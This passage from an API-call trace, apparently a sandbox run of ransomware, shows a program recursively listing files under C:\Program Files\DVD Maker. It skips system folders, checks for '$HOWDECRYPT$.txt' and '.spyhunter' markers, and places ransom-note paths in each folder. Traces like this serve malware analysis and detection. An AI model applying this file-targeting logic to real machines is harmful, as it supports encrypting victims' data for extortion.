0x34f058 [0093.013] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0093.014] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.014] lstrcmpiW (lpString1="bandwidth.png", lpString2="Windows") returned -1 [0093.014] lstrlenW (lpString="Windows") returned 7 [0093.014] lstrcmpiW (lpString1="bandwidth.png", lpString2="$Recycle.bin") returned 1 [0093.014] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.014] lstrcmpiW (lpString1="bandwidth.png", lpString2="System Volume Information") returned -1 [0093.014] lstrlenW (lpString="System Volume Information") returned 25 [0093.014] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png") returned 76 [0093.014] StrStrIW (lpFirst="bandwidth.png", lpSrch=".spyhunter") returned 0x0 [0093.014] lstrcmpW (lpString1="bandwidth.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.014] lstrcmpW (lpString1="bandwidth.png", lpString2="_uninstalling_.png") returned 1 [0093.014] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png") returned 76 [0093.014] GetProcessHeap () returned 0x2c0000 [0093.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x377d38 [0093.014] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0093.014] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.014] lstrcmpiW (lpString1="blackbars80.png", lpString2="Windows") returned -1 [0093.014] lstrlenW (lpString="Windows") returned 7 [0093.014] lstrcmpiW (lpString1="blackbars80.png", lpString2="$Recycle.bin") returned 1 [0093.014] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.014] lstrcmpiW (lpString1="blackbars80.png", lpString2="System Volume Information") returned -1 [0093.014] lstrlenW (lpString="System Volume Information") returned 25 [0093.014] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 78 [0093.014] StrStrIW (lpFirst="blackbars80.png", lpSrch=".spyhunter") returned 0x0 [0093.014] lstrcmpW (lpString1="blackbars80.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.014] lstrcmpW (lpString1="blackbars80.png", lpString2="_uninstalling_.png") returned 1 [0093.014] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 78 [0093.014] GetProcessHeap () returned 0x2c0000 [0093.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377ff0 [0093.014] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0093.014] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.015] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.015] lstrlenW (lpString="Windows") returned 7 [0093.015] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.015] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.015] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.015] lstrlenW (lpString="System Volume Information") returned 25 [0093.015] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png") returned 95 [0093.015] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.015] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.015] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.015] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png") returned 95 [0093.015] GetProcessHeap () returned 0x2c0000 [0093.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x381880 [0093.015] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0093.015] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.015] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.015] lstrlenW (lpString="Windows") returned 7 [0093.015] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.015] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.015] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.015] lstrlenW (lpString="System Volume Information") returned 25 [0093.015] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png") returned 101 [0093.015] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.015] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.015] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.015] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png") returned 101 [0093.015] GetProcessHeap () returned 0x2c0000 [0093.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10c) returned 0x37a750 [0093.015] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0093.015] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.016] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.016] lstrlenW (lpString="Windows") returned 7 [0093.016] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.016] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.016] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.016] lstrlenW (lpString="System Volume Information") returned 25 [0093.016] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png") returned 96 [0093.016] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.016] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.016] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.016] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png") returned 96 [0093.016] GetProcessHeap () returned 0x2c0000 [0093.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x375928 [0093.016] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0093.016] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.016] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.016] lstrlenW (lpString="Windows") returned 7 [0093.016] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.016] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.016] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.016] lstrlenW (lpString="System Volume Information") returned 25 [0093.016] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png") returned 102 [0093.016] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.016] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.016] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.016] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png") returned 102 [0093.016] GetProcessHeap () returned 0x2c0000 [0093.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10e) returned 0x37b110 [0093.017] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0093.017] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.017] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.017] lstrlenW (lpString="Windows") returned 7 [0093.017] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.017] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.017] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.017] lstrlenW (lpString="System Volume Information") returned 25 [0093.017] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png") returned 93 [0093.017] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.017] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.017] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.017] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png") returned 93 [0093.017] GetProcessHeap () returned 0x2c0000 [0093.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x381988 [0093.017] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1520) returned 0x2c310e0 [0093.017] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.017] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.017] lstrlenW (lpString="Windows") returned 7 [0093.017] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.017] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.017] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.017] lstrlenW (lpString="System Volume Information") returned 25 [0093.017] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png") returned 99 [0093.017] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.017] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.018] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.018] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png") returned 99 [0093.018] GetProcessHeap () returned 0x2c0000 [0093.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x108) returned 0x37b228 [0093.018] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0093.018] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.018] lstrcmpiW (lpString1="Panel_Mask.wmv", lpString2="Windows") returned -1 [0093.018] lstrlenW (lpString="Windows") returned 7 [0093.018] lstrcmpiW (lpString1="Panel_Mask.wmv", lpString2="$Recycle.bin") returned 1 [0093.018] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.018] lstrcmpiW (lpString1="Panel_Mask.wmv", lpString2="System Volume Information") returned -1 [0093.018] lstrlenW (lpString="System Volume Information") returned 25 [0093.018] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv") returned 77 [0093.018] StrStrIW (lpFirst="Panel_Mask.wmv", lpSrch=".spyhunter") returned 0x0 [0093.018] lstrcmpW (lpString1="Panel_Mask.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.018] lstrcmpW (lpString1="Panel_Mask.wmv", lpString2="_uninstalling_.png") returned 1 [0093.018] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv") returned 77 [0093.018] GetProcessHeap () returned 0x2c0000 [0093.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3781c0 [0093.018] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0093.018] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.018] lstrcmpiW (lpString1="Panel_Mask_PAL.wmv", lpString2="Windows") returned -1 [0093.018] lstrlenW (lpString="Windows") returned 7 [0093.018] lstrcmpiW (lpString1="Panel_Mask_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.018] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.018] lstrcmpiW (lpString1="Panel_Mask_PAL.wmv", lpString2="System Volume Information") returned -1 [0093.018] lstrlenW (lpString="System Volume Information") returned 25 [0093.018] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv") returned 81 [0093.018] StrStrIW (lpFirst="Panel_Mask_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.019] lstrcmpW (lpString1="Panel_Mask_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.019] lstrcmpW (lpString1="Panel_Mask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv") returned 81 [0093.019] GetProcessHeap () returned 0x2c0000 [0093.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34ef68 [0093.019] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0093.019] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0093.019] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0093.020] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\$HOWDECRYPT$.txt") returned 79 [0093.020] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\$HOWDECRYPT$.txt") returned 79 [0093.020] GetProcessHeap () returned 0x2c0000 [0093.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3782a8 [0093.021] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0093.021] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.021] lstrcmpiW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="Windows") returned -1 [0093.021] lstrlenW (lpString="Windows") returned 7 [0093.021] lstrcmpiW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0093.021] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.021] lstrcmpiW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0093.021] lstrlenW (lpString="System Volume Information") returned 25 [0093.021] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp") returned 88 [0093.021] StrStrIW (lpFirst="scene_button_style_default_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0093.021] lstrcmpW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.021] lstrcmpW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0093.021] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp") returned 88 [0093.021] GetProcessHeap () returned 0x2c0000 [0093.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x35a160 [0093.021] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0093.021] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.021] lstrcmpiW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="Windows") returned -1 [0093.021] lstrlenW (lpString="Windows") returned 7 [0093.021] lstrcmpiW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="$Recycle.bin") returned 1 [0093.021] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.021] lstrcmpiW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="System Volume Information") returned -1 [0093.021] lstrlenW (lpString="System Volume Information") returned 25 [0093.021] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png") returned 81 [0093.022] StrStrIW (lpFirst="shadowonlyframe_buttongraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.022] lstrcmpW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.022] lstrcmpW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.022] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png") returned 81 [0093.022] GetProcessHeap () returned 0x2c0000 [0093.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f508 [0093.022] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0093.022] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.022] lstrcmpiW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="Windows") returned -1 [0093.022] lstrlenW (lpString="Windows") returned 7 [0093.022] lstrcmpiW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.022] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.022] lstrcmpiW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="System Volume Information") returned -1 [0093.022] lstrlenW (lpString="System Volume Information") returned 25 [0093.022] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png") returned 87 [0093.022] StrStrIW (lpFirst="shadowonlyframe_selectionsubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.022] lstrcmpW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.022] lstrcmpW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.022] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png") returned 87 [0093.022] GetProcessHeap () returned 0x2c0000 [0093.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x3555a0 [0093.022] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0093.022] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.022] lstrcmpiW (lpString1="shadowonlyframe_videoinset.png", lpString2="Windows") returned -1 [0093.022] lstrlenW (lpString="Windows") returned 7 [0093.022] lstrcmpiW (lpString1="shadowonlyframe_videoinset.png", lpString2="$Recycle.bin") returned 1 [0093.022] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.023] lstrcmpiW (lpString1="shadowonlyframe_videoinset.png", lpString2="System Volume Information") returned -1 [0093.023] lstrlenW (lpString="System Volume Information") returned 25 [0093.023] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png") returned 78 [0093.023] StrStrIW (lpFirst="shadowonlyframe_videoinset.png", lpSrch=".spyhunter") returned 0x0 [0093.023] lstrcmpW (lpString1="shadowonlyframe_videoinset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.023] lstrcmpW (lpString1="shadowonlyframe_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0093.023] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png") returned 78 [0093.023] GetProcessHeap () returned 0x2c0000 [0093.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x378390 [0093.023] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0093.023] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.023] lstrcmpiW (lpString1="Shatter", lpString2="Windows") returned -1 [0093.023] lstrlenW (lpString="Windows") returned 7 [0093.023] lstrcmpiW (lpString1="Shatter", lpString2="$Recycle.bin") returned 1 [0093.023] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.024] lstrcmpiW (lpString1="Shatter", lpString2="System Volume Information") returned -1 [0093.024] lstrlenW (lpString="System Volume Information") returned 25 [0093.024] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 55 [0093.024] lstrcmpW (lpString1="Shatter", lpString2=".") returned 1 [0093.024] lstrcmpW (lpString1="Shatter", lpString2="..") returned 1 [0093.024] GetProcessHeap () returned 0x2c0000 [0093.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0093.024] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*") returned 57 [0093.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0093.095] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.095] lstrlenW (lpString="Windows") returned 7 [0093.095] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.095] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.095] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.096] lstrlenW (lpString="System Volume Information") returned 25 [0093.096] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\.") returned 57 [0093.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.096] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.096] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.096] lstrlenW (lpString="Windows") returned 7 [0093.096] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.096] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.096] lstrlenW (lpString="System Volume Information") returned 25 [0093.096] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\..") returned 58 [0093.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.096] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.096] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0093.096] lstrlenW (lpString="Windows") returned 7 [0093.096] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0093.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.096] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0093.096] lstrlenW (lpString="System Volume Information") returned 25 [0093.096] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png") returned 73 [0093.096] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0093.096] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.097] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0093.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png") returned 73 [0093.097] GetProcessHeap () returned 0x2c0000 [0093.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346aa8 [0093.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1490) returned 0x2c310e0 [0093.097] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.097] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0093.097] lstrlenW (lpString="Windows") returned 7 [0093.097] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="$Recycle.bin") returned 1 [0093.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.097] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="System Volume Information") returned -1 [0093.097] lstrlenW (lpString="System Volume Information") returned 25 [0093.097] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD 